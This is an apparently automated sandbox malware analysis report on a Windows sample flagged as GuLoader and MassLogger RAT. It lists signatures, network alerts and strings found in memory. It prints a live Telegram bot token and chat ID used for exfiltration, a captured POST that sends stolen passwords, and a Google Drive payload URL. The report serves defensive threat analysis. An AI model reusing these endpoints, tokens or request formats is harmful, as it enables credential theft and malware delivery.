Edit tour

Windows Analysis Report
2CQ2zMn0hb.exe

Overview

General Information

Sample name:	2CQ2zMn0hb.exe renamed because original name is a hash value
Original sample name:	df4f955eb7e72870bf18d39f3dfe1fad5fb9093a080e65f315d215bfec94cc2f.exe
Analysis ID:	1588141
MD5:	57a8326258e722638fdfab7715e94356
SHA1:	ae16c7ecb431ad5775bd0b00c39117756431422b
SHA256:	df4f955eb7e72870bf18d39f3dfe1fad5fb9093a080e65f315d215bfec94cc2f
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Disable Task Manager(disabletaskmgr)

Disables CMD prompt

Disables the Windows task manager (taskmgr)

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

2CQ2zMn0hb.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\2CQ2zMn0hb.exe" MD5: 57A8326258E722638FDFAB7715E94356)

2CQ2zMn0hb.exe (PID: 2672 cmdline: "C:\Users\user\Desktop\2CQ2zMn0hb.exe" MD5: 57A8326258E722638FDFAB7715E94356)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendMessage"}

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA", "Telegram Chatid": "2065242915"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2380434486.00000000032B8000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: 2CQ2zMn0hb.exe PID: 2672	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: 2CQ2zMn0hb.exe PID: 2672	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 2CQ2zMn0hb.exe PID: 2672	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 2 entries

Suricata Signatures

ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:53:35.981783+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49912	149.154.167.220	443	TCP
2025-01-10T21:53:37.974563+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49924	149.154.167.220	443	TCP
2025-01-10T21:53:39.734489+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49939	149.154.167.220	443	TCP
2025-01-10T21:53:41.380977+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49952	149.154.167.220	443	TCP
2025-01-10T21:53:43.120484+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49966	149.154.167.220	443	TCP
2025-01-10T21:53:44.827470+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49978	149.154.167.220	443	TCP
2025-01-10T21:53:46.523696+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49992	149.154.167.220	443	TCP
2025-01-10T21:53:48.307274+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T21:53:50.162912+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49996	149.154.167.220	443	TCP
2025-01-10T21:53:51.745783+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	49998	149.154.167.220	443	TCP
2025-01-10T21:53:53.521129+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50000	149.154.167.220	443	TCP
2025-01-10T21:53:55.218536+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50002	149.154.167.220	443	TCP
2025-01-10T21:53:56.899911+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50004	149.154.167.220	443	TCP
2025-01-10T21:53:58.626572+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50006	149.154.167.220	443	TCP
2025-01-10T21:54:00.415285+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50008	149.154.167.220	443	TCP
2025-01-10T21:54:02.010007+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50010	149.154.167.220	443	TCP
2025-01-10T21:54:03.762826+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50012	149.154.167.220	443	TCP
2025-01-10T21:54:05.377072+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50014	149.154.167.220	443	TCP
2025-01-10T21:54:06.949529+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50016	149.154.167.220	443	TCP
2025-01-10T21:54:08.660150+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50018	149.154.167.220	443	TCP
2025-01-10T21:54:10.311142+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50020	149.154.167.220	443	TCP
2025-01-10T21:54:12.148088+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50022	149.154.167.220	443	TCP
2025-01-10T21:54:13.880682+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50024	149.154.167.220	443	TCP
2025-01-10T21:54:15.739463+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50026	149.154.167.220	443	TCP
2025-01-10T21:54:17.396884+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50028	149.154.167.220	443	TCP
2025-01-10T21:54:19.009047+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50030	149.154.167.220	443	TCP
2025-01-10T21:54:20.663616+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50032	149.154.167.220	443	TCP
2025-01-10T21:54:22.334571+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50034	149.154.167.220	443	TCP
2025-01-10T21:54:23.939305+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50036	149.154.167.220	443	TCP
2025-01-10T21:54:25.633403+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50038	149.154.167.220	443	TCP
2025-01-10T21:54:27.275603+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50040	149.154.167.220	443	TCP
2025-01-10T21:54:28.966098+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50042	149.154.167.220	443	TCP
2025-01-10T21:54:30.719533+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50044	149.154.167.220	443	TCP
2025-01-10T21:54:32.680343+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50046	149.154.167.220	443	TCP
2025-01-10T21:54:34.432841+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50048	149.154.167.220	443	TCP
2025-01-10T21:54:36.122209+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50050	149.154.167.220	443	TCP
2025-01-10T21:54:37.976920+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50052	149.154.167.220	443	TCP
2025-01-10T21:54:39.575244+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50054	149.154.167.220	443	TCP
2025-01-10T21:54:41.366751+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50056	149.154.167.220	443	TCP
2025-01-10T21:54:43.154255+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50058	149.154.167.220	443	TCP
2025-01-10T21:54:44.897740+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50060	149.154.167.220	443	TCP
2025-01-10T21:54:46.729765+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50062	149.154.167.220	443	TCP
2025-01-10T21:54:50.540759+0100	2057744	1	Malware Command and Control Activity Detected	192.168.2.5	50064	149.154.167.220	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:53:28.377864+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49861	132.226.247.73	80	TCP
2025-01-10T21:53:35.049704+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49861	132.226.247.73	80	TCP
2025-01-10T21:53:36.877827+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49919	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:53:22.884979+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49827	142.250.181.238	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T21:53:35.731626+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49912	149.154.167.220	443	TCP
2025-01-10T21:53:37.461511+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49924	149.154.167.220	443	TCP
2025-01-10T21:53:39.482257+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49939	149.154.167.220	443	TCP
2025-01-10T21:53:41.069098+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49952	149.154.167.220	443	TCP
2025-01-10T21:53:42.706837+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49966	149.154.167.220	443	TCP
2025-01-10T21:53:44.469261+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49978	149.154.167.220	443	TCP
2025-01-10T21:53:46.165705+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49992	149.154.167.220	443	TCP
2025-01-10T21:53:47.899210+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49994	149.154.167.220	443	TCP
2025-01-10T21:53:49.714041+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49996	149.154.167.220	443	TCP
2025-01-10T21:53:51.487456+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	49998	149.154.167.220	443	TCP
2025-01-10T21:53:53.072656+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50000	149.154.167.220	443	TCP
2025-01-10T21:53:54.852859+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50002	149.154.167.220	443	TCP
2025-01-10T21:53:56.551895+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50004	149.154.167.220	443	TCP
2025-01-10T21:53:58.235121+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50006	149.154.167.220	443	TCP
2025-01-10T21:53:59.990628+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50008	149.154.167.220	443	TCP
2025-01-10T21:54:01.743321+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50010	149.154.167.220	443	TCP
2025-01-10T21:54:03.311177+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50012	149.154.167.220	443	TCP
2025-01-10T21:54:05.099974+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50014	149.154.167.220	443	TCP
2025-01-10T21:54:06.699169+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50016	149.154.167.220	443	TCP
2025-01-10T21:54:08.299177+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50018	149.154.167.220	443	TCP
2025-01-10T21:54:09.997332+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50020	149.154.167.220	443	TCP
2025-01-10T21:54:11.647843+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50022	149.154.167.220	443	TCP
2025-01-10T21:54:13.504537+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50024	149.154.167.220	443	TCP
2025-01-10T21:54:15.227888+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50026	149.154.167.220	443	TCP
2025-01-10T21:54:17.083559+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50028	149.154.167.220	443	TCP
2025-01-10T21:54:18.772286+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50030	149.154.167.220	443	TCP
2025-01-10T21:54:20.363513+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50032	149.154.167.220	443	TCP
2025-01-10T21:54:22.025052+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50034	149.154.167.220	443	TCP
2025-01-10T21:54:23.642541+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50036	149.154.167.220	443	TCP
2025-01-10T21:54:25.293495+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50038	149.154.167.220	443	TCP
2025-01-10T21:54:27.013839+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50040	149.154.167.220	443	TCP
2025-01-10T21:54:28.650344+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50042	149.154.167.220	443	TCP
2025-01-10T21:54:30.290587+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50044	149.154.167.220	443	TCP
2025-01-10T21:54:32.057964+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50046	149.154.167.220	443	TCP
2025-01-10T21:54:34.032254+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50048	149.154.167.220	443	TCP
2025-01-10T21:54:35.760434+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50050	149.154.167.220	443	TCP
2025-01-10T21:54:37.461689+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50052	149.154.167.220	443	TCP
2025-01-10T21:54:39.285866+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50054	149.154.167.220	443	TCP
2025-01-10T21:54:40.970394+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50056	149.154.167.220	443	TCP
2025-01-10T21:54:42.732052+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50058	149.154.167.220	443	TCP
2025-01-10T21:54:44.467248+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50060	149.154.167.220	443	TCP
2025-01-10T21:54:46.270205+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50062	149.154.167.220	443	TCP
2025-01-10T21:54:50.129484+0100	1810008	1	Potentially Bad Traffic	192.168.2.5	50064	149.154.167.220	443	TCP

HTTP traffic detected: POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd318ef030315cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive

Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndn
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034CD1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348C1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348C1000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/-
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/D
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3308028734.0000000037149000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/z
Source: 2CQ2zMn0hb.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A5F000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034C47000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034BFB000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034ACA000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003499C000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034987000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034D2E000.00000004.00000800.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.0000000034A7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.000000003491B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.orgOC
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004428000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.0000000004462000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3286957419.0000000005DE0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2478153692.0000000004490000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000448D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000447D000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000447D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1tBsrC4u2iD4Tc-3CQ1gHCfISO7xUM42y&export=download)
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2478153692.0000000004490000.00000004.00000020.00020000.00000000.sdmp, 2CQ2zMn0hb.exe, 00000003.00000002.3286663082.000000000448D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/q
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 2CQ2zMn0hb.exe, 00000003.00000002.3306564434.00000000348F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/translate_a/element.js
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/analytics.js
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: 2CQ2zMn0hb.exe, 00000003.00000003.2436614516.0000000004497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50022 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50062
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50028
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50064 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50064
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50026
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
